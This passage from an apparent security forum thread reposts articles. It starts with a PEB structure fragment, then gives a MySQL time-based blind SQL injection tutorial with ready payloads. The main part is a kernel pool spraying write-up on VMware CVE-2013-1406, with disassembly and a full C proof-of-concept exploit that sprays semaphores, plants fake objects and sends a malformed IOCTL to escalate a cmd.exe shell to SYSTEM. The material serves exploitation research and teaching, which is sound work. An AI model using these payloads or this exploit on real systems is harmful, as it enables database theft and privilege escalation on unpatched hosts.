UNICODE_STRING_T<T> CSDVersion; T ActivationContextData; T ProcessAssemblyStorageMap; T SystemDefaultActivationContextData; T SystemAssemblyStorageMap; T MinimumStackCommit; }; typedef _PEB_T<DWORD, DWORD64, 34> PEB32; typedef _PEB_T<DWORD64, DWORD, 30> PEB64; #pragma pack(pop) Above version is system independent as all fields that are changing across OS versions are marked as _SYSTEM_DEPENDENT_xx. I’ve also removed all fields from the end that were added after Widnows XP. Sursa: Evolution of Process Environment Block (PEB)
  23. [h=3]MySQL Injection Time Based[/h]We have already written a couple of posts on SQL Injection techniques, Such as "SQL Injection Union Based", "Blind SQL Injection" and last but not least "Common problems faced while performing SQL Injection", However how could the series miss the "Time based SQL injection" technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to @yappare. Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi Time-Based Blind SQL Injection with Heavy Queries and of course the greatest cheatsheet, Cheat Sheets | pentestmonkey OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine. Tested on Peruggia application. Lets gO! Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do. But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function. each DBMS have different type of function to use,but the steps usually quite similar. In MSSQL we use WAITFOR DELAY In POSTGRES we use PG_DELAY() and so on..do check it on pentestmonkey cheatsheet Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not. Test it using this command pic_id=13 and sleep(5)-- As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well. Lets proceed to check the current user. Here's the command the we are going to use pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)-- Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters. From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why? Because the 1st character of the current user start with 'p'.. not 'a' or 'h' Then you can proceed to check for its 2nd character and so on. pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)-- pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)-- so on.. So go on with table_name guessing. pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1) The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then. While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist! How about guessing the column_name?Its easy. pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1) See the image above?Still need any explanation? I bet you guys already understand it! Get the data mode! pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)-- So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds. And then proceed to test the 2nd,3rd char and so on.. The image shown that the username=admin..so is it correct?lets double check it Yeahhh.its correct. That's all for now! Thanks, @yappare Sursa: MySQL Injection Time Based | Learn How To Hack - Ethical Hacking and security tips
  24. [h=3]Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406[/h]Author: Artem Shishkin, Positive Research. If you deal with Windows kernel vulnerabilities, it is likely that you’ll have to deal with a kernel pool in order to develop an exploit. I guess it is useful to learn how to keep the behavior of this kernel entity under your control. In this article I will try to give a high level overview of kernel pool internals. This object has already been deeply researched several times, so if you need more technical information, you please goolge it or use the references at the end of this article. Kernel pool structure overview Kernel pool is a common place for mining memory in the operating system kernel. Remember that there are very small stacks in the kernel environment. They are suitable only for a small bunch of local non-array variables. Once a driver needs to create a large data structure or a string, it will certainly use the pool memory. There are different types of pools, but all of them have the same structure (except of the driver verifier’s special pool). Every pool has a special control structure called a pool descriptor. Among the other purposes, it maintains lists of free pool chunks, which represent a free pool space. A pool itself consists of memory pages. They can be standard 4 KB or large 1 MB in size. The number of pages used for the pool is dynamically adjusted. Kernel pool pages are then split into chunks. These are the exact chunks that drivers are given when requesting memory from the pool. Pool chunk on x86 systems Pool chunks have the following meta-information inside 1. Previous size — a size of the preceding chunk. 2. Pool index field is used for situations with more than one pool of a certain type. For example, there are multiple paged pools in the system. This field is used to identify which exact paged pool this chunk belongs to. 3. Block size is a size of the current chunk. Just like the previous size field, the size is encoded as (pool chunk data size + size of pool header + optional 4 bytes of a pointer to the process quoted) >> 3 (or >> 4 on x64 systems). 4. Pool type field is a flag bitmask for the current chunk. Notice that those flags are not officially documented. T (Tracked): this chunk is tracked by the driver verifier. Pool tracking is used for debugging purposes. S (Session): the chunk belongs to the paged session pool, it is a special pool used for session specific allocations. Q (Quota): the chunk takes part in quota management mechanism. This flag is only relevant for 32-bit systems. If this flag is present, a pointer to the process quoted this chunk is stored at the end of the chunk. U (In use): this chunk is currently in use. As opposed a chunk can be free, which means that we can allocate memory from it. This flag is a third bit for pre-vista systems and the second for vista and upper. B (Base pool) identifies a pool which the chunk belongs to. There are two base pools – paged and non-paged. Non-paged pool is encoded as 0 and paged pool as 1. For pre-vista systems this flag could occupy two bits because the base pool type was encoded as (base pool type + 1), that is 0x10 for paged pool and 0x1 for non-paged pool. 5. Pool tag is used for debugging purposes. Drivers specify a four-byte character signature which identifies a subsystem or a driver that uses this chunk. For example “NtFs” tag means that this chunk belongs to the ntfs.sys driver. Pool chunk on x64 systems There is a couple of differences on 64-bit systems. The first one is a different size for fields and the second one is a new 8-byte field with a pointer to the process that quoted this chunk. Kernel pool memory allocation overview Imagine that the pool is empty. I mean there is no pool space at all. If we try to allocate memory from the pool (let’s say that its size is less than 0xFF0), it will first allocate a memory page and then place a chunk of the requested size on it. Since it is the first allocation on this page, the chunk will be placed at the start of this page. The first pool chunk allocation sequence This page has now two pool chunks — the one that we allocated and a free one. The free chunk can now be used for consequent allocations. But from this moment pool allocator tends to place new chunks at the end of the page or the free space within this page. Pool chunk allocation strategy When it comes to the deallocation of the chunks, the process is repeated in a reverse order. The chunks become free, and they are merged if they are adjacent. Pool deallocation strategy The whole situation with empty pools is just a fantasy, because the pools are charged with memory pages by the moment we can actually use them. Controlling the behavior of chunk allocations Let’s keep in mind the fact that kernel pool is a heavily-used object. First of all it used for creating all sorts of kernel objects, private kernel and drivers structures. Secondly, kernel pool takes part in a number of system calls, providing a buffer for the corresponding parameters. Since the computer is constantly servicing hardware by means of drivers and software by means of system calls, you can imagine the rate of kernel pool usage even when the system stays idle. Sooner or later kernel pool becomes fragmented. It happens because of different sizes of allocations and frees following in a different order. Here goes out the origin of the “spraying” term — when sequentially allocating chunks of pool, those chunks are not necessarily followed by each other, there are most likely to be located at completely different places in memory. So, when filling the pool memory with controlled red-painted chunks we are likely going to see the left side of a picture, then the right one. Heap spraying leads to the left picture, not the right one But there is an important exploiting-relevant circumstance: when there is no black region left for painting, we’ll get a new black region without stranger’s spots. From this point our spray becomes an ordinary brush with solid color fill. From here we have a considerable level of controlling the behavior of chunk allocation and a picture of the pool. We say considerable because it is still not the case when we are guaranteed to be the painting master, because our painting process can be interrupted by someone else spilling a different color. The spraying becomes filling when using a lot of objects Depending on a type of an object that we are using for spraying, we are able to create free windows of a needed size by freeing a number of objects that we created before. And the most important fact that allows us to make a controlled allocation is that pool allocator tends to be as fast as it possible. In order to use processor cache effectively the last freed pool chunk will be the first one that is allocated! It is the point of the controlled allocation because we can guess the address of the chunk to be allocated. Of course the size of the allocation matters. That’s why we have to calculate the size of the free chunks window. If we have to allocate a 0x315 bytes chunk, and we are spraying 0x20 bytes chunks, we have to free 0x315 / 0x20 = (0x18 + 1) chunks. I hope this is clear enough. Here are some points we need to consider in order to be successful in kernel pool spraying: 1. If you don’t have an opportunity of allocating the kernel pool with some sort of a target driver, you can always use windows objects as spraying objects. Since windows object are naturally the object of the operating system kernel, they are stored in kernel pools. For non-paged pool you can use processes, threads, events, semaphores, mutexes etc. For paged pool you can use directory objects, key objects, section objects (also known as file mapping) etc. For session pool you can use any GDI or USER object: palettes, DCs, brushes etc. In order to free the memory occupied by those objects, you can simply close all open handles to them. 2. By the time we are going to start spraying there are pages available for pool usage, but they are too defragmented. If we need a space filled sequentially with controlled chunks, we need to spam the pool so there is no place on currently available pages. After this we’ll get a new clean page leading to the chance of sequential allocation of controlled chunks. In a nutshell, create lots of spraying objects. 3. When calculating a necessary window size, keep in mind that chunk header size matters, also the whole size is rounded up to 8 and 16 bytes on x86 and x64 machines respectively. 4. Although we are able to control the manner of allocation of the pool chunks, it is difficult to predict relative positions of the sprayed objects. If you use windows object for spraying thus having only the handle of an object but not it’s address, you can leak kernel object using the NtQuerySystemInformation() function with SystemExtendedHandleInformation class. It will provide you all the information needed for precise spraying. 5. Keep the balance of the sprayed objects quantity. You’ll probably fail controlling the chunk allocation when the is no memory left in the system at all. 6. One of the tricks that might help you to improve reliability of kernel pool based exploits is assigning a high priority to the spraying and triggering thread. Since there is a race for using the pool memory it is useful to modify the pool sharing priority by having more chances to execute than the other threads in the system. It will help you to keep your spraying more consistent. Also consider the gap between spraying and triggering the vulnerability: the less it is, the more chance you get to land on the controlled pool chunk. VMware CVE 2013-1406 A couple of weeks ago an interesting advisory by VMware was published. It promised local privilege escalation on both host and guest systems thus leading to a double ownage. The vulnerable component was vmci.sys. VMCI stands for Virtual Machine Communication Interfaceis used for fast and efficient communication between guest virtual machines and their host server. VMCI presents a custom socket type implemented as a Windows Socket Service Provider in a vsocklib.dll library. The module vmci.sys creates a virtual device that implements the needed functionality. This driver is always running on the host system. As for guest systems, VMware tools have to be installed in order to use VMCI. When writing an overview it would be nice to explain a high-level logic of vulnerability in order to present a detective-like story. Unfortunately this is not the case, because there is not much public information about VMCI implementation. I don’t think that people who exploit vulnerabilities always go deep into details reverse engineering the whole target system. At least it would be more profitable to obtain a stable working exploit within a week than a high-level knowledge of how the things work in months. PatchDiff highlight three patched functions. All of them were are relevant to the same IOCTL code 0x8103208C – something terribly went wrong with handling it. Control flow of the code processing the 0x8103208C IOCTL The third patched function eventually was called both from the first and the second ones. The third function is supposed to allocate a pool chunk of a requested size times 0x68 and initialize it with zeroes. It contained an internal structure for dispatching the request. The problem was that a chunk size was specified in a user buffer for this IOCTL code and was not checked properly. As a result, an internal structure was not allocated which led to interesting consequences. A buffer is supplied for this IOCTL, its size is supposed to be 0x624 in order to reach patched functions. In order to process user request in internal structure is allocated, its size is 0x20C. Its first 4 bytes were filled with a value, specified at [user_buffer + 0x10]. These exact bytes are used to allocate another internal structure the pointer to which is then stored at the last four bytes of the first one. But no matter was the second chunk allocated or not, a sort of a dispatch function was invoked. .text:0001B2B4 ; int __stdcall DispatchChunk(PVOID pChunk) .text:0001B2B4 DispatchChunk proc near ; CODE XREF: PatchedOne+78 .text:0001B2B4 ; UnsafeCallToPatchedThree+121 .text:0001B2B4 .text:0001B2B4 pChunk = dword ptr 8 .text:0001B2B4 .text:0001B2B4 000 mov edi, edi .text:0001B2B6 000 push ebp .text:0001B2B7 004 mov ebp, esp .text:0001B2B9 004 push ebx .text:0001B2BA 008 push esi .text:0001B2BB 00C mov esi, [ebp+pChunk] .text:0001B2BE 00C mov eax, [esi+208h] .text:0001B2C4 00C xor ebx, ebx .text:0001B2C6 00C cmp eax, ebx .text:0001B2C8 00C jz short CheckNullUserSize .text:0001B2CA 00C push eax ; P .text:0001B2CB 010 call ProcessParam ; We won’t get here .text:0001B2D0 .text:0001B2D0 CheckNullUserSize: ; CODE XREF: DispatchChunk+14 .text:0001B2D0 00C cmp [esi], ebx .text:0001B2D2 00C jbe short CleanupAndRet .text:0001B2D4 00C push edi .text:0001B2D5 010 lea edi, [esi+8] .text:0001B2D8 .text:0001B2D8 ProcessUserBuff: ; CODE XREF: DispatchChunk+51 .text:0001B2D8 010 mov eax, [edi] .text:0001B2DA 010 test eax, eax .text:0001B2DC 010 jz short NextCycle .text:0001B2DE 010 or ecx, 0FFFFFFFFh .text:0001B2E1 010 lea edx, [eax+38h] .text:0001B2E4 010 lock xadd [edx], ecx .text:0001B2E8 010 cmp ecx, 1 .text:0001B2EB 010 jnz short DerefObj .text:0001B2ED 010 push eax .text:0001B2EE 014 call UnsafeFire ; BANG!!!! .text:0001B2F3 .text:0001B2F3 DerefObj: ; CODE XREF: DispatchChunk+37 .text:0001B2F3 010 mov ecx, [edi+100h] ; Object .text:0001B2F9 010 call ds:ObfDereferenceObject .text:0001B2FF .text:0001B2FF NextCycle: ; CODE XREF: DispatchChunk+28 .text:0001B2FF 010 inc ebx .text:0001B300 010 add edi, 4 .text:0001B303 010 cmp ebx, [esi] .text:0001B305 010 jb short ProcessUserBuff .text:0001B307 010 pop edi .text:0001B308 .text:0001B308 CleanupAndRet: ; CODE XREF: DispatchChunk+1E .text:0001B308 00C push 20Ch ; size_t .text:0001B30D 010 push esi ; void * .text:0001B30E 014 call ZeroChunk .text:0001B313 00C push 'gksv' ; Tag .text:0001B318 010 push esi ; P .text:0001B319 014 call ds:ExFreePoolWithTag .text:0001B31F 00C pop esi .text:0001B320 008 pop ebx .text:0001B321 004 pop ebp .text:0001B322 000 retn 4 .text:0001B322 DispatchChunk endp The dispatch function was searching for a pointer to process. The processing included dereferencing some object and calling some function if an appropriate flags had been set inside the pointed structure. But since we failed to allocate a structure to process, the dispatch function slid beyond the end of the first chunk. This processing leads to an access violation and a following BSOD when uncontrolled. IOCTL dispatch structure and the dispatcher behavior So we’ve got a possible code execution at the controlled address: .text:0001B946 .text:0001B946 .text:0001B946 arg_0 = dword ptr 8 .text:0001B946 .text:0001B946 000 mov edi, edi .text:0001B948 000 push ebp .text:0001B949 004 mov ebp, esp .text:0001B94B 004 mov eax, [ebp+arg_0] .text:0001B94E 004 push eax .text:0001B94F 008 call dword ptr [eax+0ACh] ; BANG!!!! .text:0001B955 004 pop ebp .text:0001B956 000 retn 4 .text:0001B956 UnsafeFire endp.text:0001B946 UnsafeFire proc near Exploitation Since the chunk dispatch code slips beyond the chunk it is supposed to process, it meets the neighbor chunk or an unmapped page. If it falls into an unmapped memory, a BSOD occurs. But when it meets another pool chunk it tries to process a pool header interpreting it as a pointer. Consider x86 system. The four bytes the dispatcher function tries to interpret as a pointer are the previous block size, pool index, current block size and pool type flags. Since we know the size and a pool index used for the skipped chunk, we know the low word of a pointer: 0xXXXX0043 – 0x43 is a size of a skipped chunk, thus becomes a previous size of a chunk in a neighbor. 0x0 is a pool index, which is guaranteed to be equal to 0, since non-paged pool used for the skipped chunk is the only one in the system. Notice that if the two adjacent chunks share the same pool page, they belong to the same pool type and index. The high word contains the block size, which we can’t predict and pool type flags which we can: B = 0 because the chunk is from the non-paged pool, U = 1 because the is supposed to be in use, Q = 0/1 the chunk might be quoted, S = 0 because the pool is not the session one, T = 0 pool tracking is likely to be disabled by default. The unused bits in the pool type field are equal to 0. So we’ve got the following memory windows valid for Windows 7 and Windows 8: 0x04000000 – 0x06000000 for ordinary chunks 0x14000000 – 0x16000000 for quoted chunks Based on the provided information you can easily calculate memory windows for Windows XP and alike. As you can see, those memory ranges belong to the user space, so we are able to force the vulnerable dispatch function to execute a shellcode that we provide. In order to perform arbitrary code execution we have to map the calculated regions and meet the requirements of the dispatch function: 1. Within the [0x43 + 0x38] place a DWORD value of 1 in order to meet the requirements of the following code: .text:0001B2E1 010 lea edx, [eax+38h] .text:0001B2E4 010 lock xadd [edx], ecx .text:0001B2E8 010 cmp ecx, 1 2. Within the [0x43 + 0xAC] place a pointer to the function to be called, or simply the address of a shellcode. 3. Within the [0x43 + 0x100] place a pointer of a fake object to be dereferenced with ObfDereferenceObject() function. Notice that the reference count is taken from the object header, which is located at a negative offset to the object itself, so be sure that this function is not going to land on the unmapped region. Also provide a suitable reference count in order the ObfDereferenceObject() would not try to free the user-mode memory with the functions that are not suited for that. 4. Repeat this algorithm for every 0x10000 bytes. Everything has been done right! Improving reliability of an exploit Although we have developed a nice strategy of exploitation, it is still unreliable. Consider the case when the chunk after vulnerable one is freed. It is difficult to guess the state of this chunk fields. That means that although such chunk forms a pointer valid for the dispatch function (because it is not NULL) the result of the dispatching will lead to a BSOD. It is also true for the case when the dispatch function slides to an unmapped virtual address. Kernel pool spraying is very useful in this case. As a spraying object I chose semaphores since they could provide the closest chunk size to the one I needed. As a result this technique helped a lot improving the stability of an exploit. Remember that Windows 8 has a SMEP support, so it is a little bit more complicate to exploit due to the laziness of a shellcode developer. Writing a base-independent code and bypassing SMEP is left as an exercise for a reader. As for the x64 systems, the problem is that the pointer became 8 bytes in size. This means that a high DWORD of a pointer interpreted in the dispatch function falls on the pool chunk tag field. As far as most drivers and kernel subsystems user ASCII symbols for tagging, the pointer falls into non-canonical address space, so it can’t be used for exploitation. By this time I was unable to find a solution for this problem. In the end I hope this article was useful for you, and I’m sorry that I could not fit all the needed information in a couple of paragraphs. I wish you good luck in researching and exploiting for the sake of making the things more secure. Source Code: /* CVE-2013-1406 exploitation PoC by Artem Shishkin, Positive Research, Positive Technologies, 02-2013 */ void __stdcall FireShell(DWORD dwSomeParam) { EscalatePrivileges(hProcessToElevate); // Equate the stack and quit the cycle #ifndef _AMD64_ __asm { pop ebx pop edi push 0xFFFFFFF8 push 0xA010043 } #endif } HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0) { HANDLE hResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr)) { hResult = pHandleTable->Handles[i].HandleValue; break; } } return hResult; } PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { PVOID pResult = 0; DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return 0; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pResult = (HANDLE)pHandleTable->Handles[i].Object; break; } } return pResult; } void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) { DWORD dwLookupProcessID = dwProcessID; if (pHandleTable == NULL) { printf("Ain't funny\n"); return; } if (dwLookupProcessID == 0) { dwLookupProcessID = GetCurrentProcessId(); } for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) { if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) { pHandleTable->Handles[i].Object = NULL; pHandleTable->Handles[i].HandleValue = NULL; break; } } return; } void PoolSpray() { // Init used native API function lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModu leHandle(L"ntdll.dll"), "NtQuerySystemInformation"); if (NtQuerySystemInformation == NULL) { printf("Such a fail...\n"); return; } // Determine object size // xp: //const DWORD_PTR dwSemaphoreSize = 0x38; // 7: //const DWORD_PTR dwSemaphoreSize = 0x48; DWORD_PTR dwSemaphoreSize = 0; if (LOBYTE(GetVersion()) == 5) { dwSemaphoreSize = 0x38; } else if (LOBYTE(GetVersion()) == 6) { dwSemaphoreSize = 0x48; } unsigned int cycleCount = 0; while (cycleCount < 50000) { HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL); if (hTemp == NULL) { break; } ++cycleCount; } printf("\t[+] Spawned lots of semaphores\n"); printf("\t[.] Initing pool windows\n"); Sleep(2000); DWORD dwNeeded = 4096; NTSTATUS status = 0xFFFFFFFF; PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); while (true) { status = NtQuerySystemInformation(SystemExtendedHandleInfor mation, pBuf, dwNeeded, NULL); if (status != STATUS_SUCCESS) { dwNeeded *= 2; VirtualFree(pBuf, 0, MEM_RELEASE); pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE); } else { break; } }; HANDLE hHandlesToClose[0x30] = {0}; DWORD dwCurPID = GetCurrentProcessId(); PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf; for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++) { if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID) { DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object; DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue; DWORD_PTR dwWindowAddress = 0; bool bPoolWindowFound = false; UINT iObjectsNeeded = 0; // Needed window size is vmci packet pool chunk size (0x218) divided by // Semaphore pool chunk size (dwSemaphoreSize) iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0); if ( // Not on a page boundary ((dwTestObjAddr & 0xFFF) != 0) && // Doesn't cross page boundary (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) ) { // Check previous object for being our semaphore DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize; if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL) { continue; } for (unsigned int j = 1; j < iObjectsNeeded; j++) { DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize); HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr); //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal); //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr); //printf("\tLooked up handle = %08X\n", hLookedUp); if (hLookedUp != NULL) { hHandlesToClose[j] = hLookedUp; if (j == iObjectsNeeded - 1) { // Now test the following object dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize); if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL) { hHandlesToClose[0] = (HANDLE)dwTestHandleVal; bPoolWindowFound = true; dwWindowAddress = dwTestObjAddr; // Close handles to create a memory window for (int k = 0; k < iObjectsNeeded; k++) { if (hHandlesToClose[k] != NULL) { CloseHandle(hHandlesToClose[k]); CloseTableHandle(pHandleTable, hHandlesToClose[k]); } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } } else { memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); break; } } if (bPoolWindowFound) { printf("\t[+] Window found at %08X!\n", dwWindowAddress); } } } } VirtualFree(pBuf, 0, MEM_RELEASE); return; } void InitFakeBuf(PVOID pBuf, DWORD dwSize) { if (pBuf != NULL) { RtlFillMemory(pBuf, dwSize, 0x11); } return; } void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep) { /* Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043 So, for every 0xXXXX0043 address we must suffice the following conditions: lea edx, [eax+38h] lock xadd [edx], ecx cmp ecx, 1 Some sort of lock at [addr + 38] must be equal to 1. And call dword ptr [eax+0ACh] The call site is located at [addr + 0xAC] Also fake the object to be dereferenced at [addr + 0x100] */ if (pBuf != NULL) { for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep) { PDWORD pLock = (PDWORD)(iAddr + 0x38); PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC); PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100); *pLock = 1; *pCallMeMayBe = (DWORD_PTR)FireShell; *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000; } } return; } void PenetrateVMCI() { /* VMware Security Advisory Advisory ID: VMSA-2013-0002 Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability Issue date: 2013-02-07 Updated on: 2013-02-07 (initial advisory) CVE numbers: CVE-2013-1406 */ DWORD dwPidToElevate = 0; HANDLE hSuspThread = NULL; bool bXP = (LOBYTE(GetVersion()) == 5); bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1)); bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2)); if (!InitKernelFuncs()) { printf("[-] Like I don't know where the shellcode functions are\n"); return; } if (bXP) { printf("[?] Who do we want to elevate?\n"); scanf_s("%d", &dwPidToElevate); hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate); if (hProcessToElevate == NULL) { printf("[-] This process doesn't want to be elevated\n"); return; } } if (b7 || b8) { // We are unable to change an active process token on-the-fly, // so we create a custom shell suspended (Ionescu hack) STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; si.wShowWindow = TRUE; WCHAR cmdPath[MAX_PATH] = {0}; GetSystemDirectory(cmdPath, MAX_PATH); wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe"); if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, ?) == TRUE) { hProcessToElevate = pi.hProcess; hSuspThread = pi.hThread; } } HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); if (hVMCIDevice != INVALID_HANDLE_VALUE) { UCHAR BadBuff[0x624] = {0}; UCHAR retBuf[0x624] = {0}; DWORD dwRet = 0; printf("[+] VMCI service found running\n"); PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff; pVmReq->Header.RequestSize = 0xFFFFFFF0; PVOID pShellSprayBufStd = NULL; PVOID pShellSprayBufQtd = NULL; PVOID pShellSprayBufStd7 = NULL; PVOID pShellSprayBufQtd7 = NULL; PVOID pShellSprayBufChk8 = NULL; if ((b7) || (bXP) || (b8)) { /* Significant bits of a PoolType of a chunk define the following regions: 0x0A000000 - 0x0BFFFFFF - Standard chunk 0x1A000000 - 0x1BFFFFFF - Quoted chunk 0x0 - 0xFFFFFFFF - Free chunk - no idea Addon for Windows 7: Since PoolType flags have changed, and "In use flag" is now 0x2, define an additional region for Win7: 0x04000000 - 0x06000000 - Standard chunk 0x14000000 - 0x16000000 - Quoted chunk */ pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL)) { printf("\t[-] Unable to map the needed memory regions, please try running the app again\n"); CloseHandle(hVMCIDevice); return; } InitFakeBuf(pShellSprayBufStd, 0x2000000); InitFakeBuf(pShellSprayBufQtd, 0x2000000); InitFakeBuf(pShellSprayBufStd7, 0x2000000); InitFakeBuf(pShellSprayBufQtd7, 0x2000000); PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000); if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE) { SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST); } PoolSpray(); if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE) { printf("\t[!] If you don't see any BSOD, you're successful\n"); if (b7 || b8) { ResumeThread(hSuspThread); } } else { printf("[-] Not this time %d\n", GetLastError()); } if (pShellSprayBufStd != NULL) { VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE); } if (pShellSprayBufQtd != NULL) { VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE); } } SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL); CloseHandle(hVMCIDevice); } else { printf("[-] Like I don't see vmware here\n"); } CloseHandle(hProcessToElevate); return; } References [1] Tarjei Mandt. Kernel Pool Exploitation on Windows 7. Black Hat DC, 2011 [2] Nikita Tarakanov. Kernel Pool Overflow from Windows XP to Windows 8. ZeroNights, 2011 [3] Kostya Kortchinsky. Real world kernel pool exploitation. SyScan, 2008 [4] SoBeIt. How to exploit Windows kernel memory pool. X’con, 2005 ? Video Demonstration: Author: Artem Shishkin, Positive Research. Sursa: Positive Research Center: Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406
